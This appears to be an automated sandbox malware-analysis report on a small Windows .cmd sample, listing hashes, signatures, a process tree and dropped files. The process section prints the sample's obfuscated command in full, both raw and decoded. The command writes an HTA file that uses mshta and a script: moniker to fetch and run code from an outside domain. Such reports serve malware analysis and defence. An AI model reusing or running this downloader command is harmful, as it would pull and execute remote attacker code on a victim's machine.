Analysis
-
max time kernel
117s -
max time network
129s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
14-01-2022 07:00
Static task
static1
Behavioral task
behavioral1
Sample
536749.742.67513.78924_208.69621.4895824ã.cmd
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
536749.742.67513.78924_208.69621.4895824ã.cmd
Resource
win10-en-20211208
General
-
Target
536749.742.67513.78924_208.69621.4895824ã.cmd
-
Size
344B
-
MD5
19461ec95d2ed8da4cc2c4d9550aa125
-
SHA1
16a95e645237cfcf43e1ac67608783513e7dbfe3
-
SHA256
758416f5eaeb77570a9529e928cf21a38e803664412a198452719a8b9e994d19
-
SHA512
4e4d8e9fe6969546c188f02c28525bcaf589801c72054e2e116d05189e6004283a395110717b8936d520ebedc4e9b3b49bc6327d395689c186e695942a03adbe
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exeflow pid process 19 856 mshta.exe 21 856 mshta.exe 23 856 mshta.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
cmd.execmd.execmd.execmd.exedescription pid process target process PID 1804 wrote to memory of 1776 1804 cmd.exe cmd.exe PID 1804 wrote to memory of 1776 1804 cmd.exe cmd.exe PID 1776 wrote to memory of 2892 1776 cmd.exe cmd.exe PID 1776 wrote to memory of 2892 1776 cmd.exe cmd.exe PID 1776 wrote to memory of 3380 1776 cmd.exe cmd.exe PID 1776 wrote to memory of 3380 1776 cmd.exe cmd.exe PID 3380 wrote to memory of 1312 3380 cmd.exe cmd.exe PID 3380 wrote to memory of 1312 3380 cmd.exe cmd.exe PID 1312 wrote to memory of 856 1312 cmd.exe mshta.exe PID 1312 wrote to memory of 856 1312 cmd.exe mshta.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\536749.742.67513.78924_208.69621.4895824ã.cmd"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /V/D/c "seT sKk=script&&seT px=mshta&&SEt AJKP=C:\Users\Public\Videos\^dOW&&SEt GSEM=^<!sKk!^>try{vfYYar c='!sKk!:';d='hfYYTtP:';GfYYetObjfYYect(c+d+'&&sET 9IF=BOTKRBOTKRa9eikr.5wyck43a9uxnu7e.cfdBOTKR?1BOTKR');}catch(e){}close();^</!sKk!^>&&sEt/^p JGDH="!GSEM:fYY=!!9IF:BOTKR=/!"<nul > !AJKP!.Hta|start /MIN CMD /c !px! !AJKP!.HtA "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt/p JGDH="<script>try{var c='script:';d='hTtP:';GetObject(c+d+'//a9eikr.5wyck43a9uxnu7e.cfd/?1/');}catch(e){}close();</script>" 0<nul 1>C:\Users\Public\Videos\dOW.Hta"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" start /MIN CMD /c mshta C:\Users\Public\Videos\dOW.HtA "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeCMD /c mshta C:\Users\Public\Videos\dOW.HtA4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta C:\Users\Public\Videos\dOW.HtA5⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Videos\dOW.HtAMD5
4493b5e3f684c33ba8ee862f2fdb9944
SHA1e489710719416946503438f5675da901b8ee0dd8
SHA256f1c703ab466011aaf49c4f2284a0a0d9c85f53095369022648d32692271ede2a
SHA5123a8b5a970621eea4bab132b7ed85394d90295a93c3c834386ee3c27c6fde3c8128e08d182f7ab84759822f785fa32dd4a1b3b2e65162271deb4183b48887969a
-
memory/856-121-0x0000000000000000-mapping.dmp
-
memory/856-122-0x0000020A0F608000-0x0000020A0F610000-memory.dmpFilesize
32KB
-
memory/1312-120-0x0000000000000000-mapping.dmp
-
memory/1776-117-0x0000000000000000-mapping.dmp
-
memory/2892-118-0x0000000000000000-mapping.dmp
-
memory/3380-119-0x0000000000000000-mapping.dmp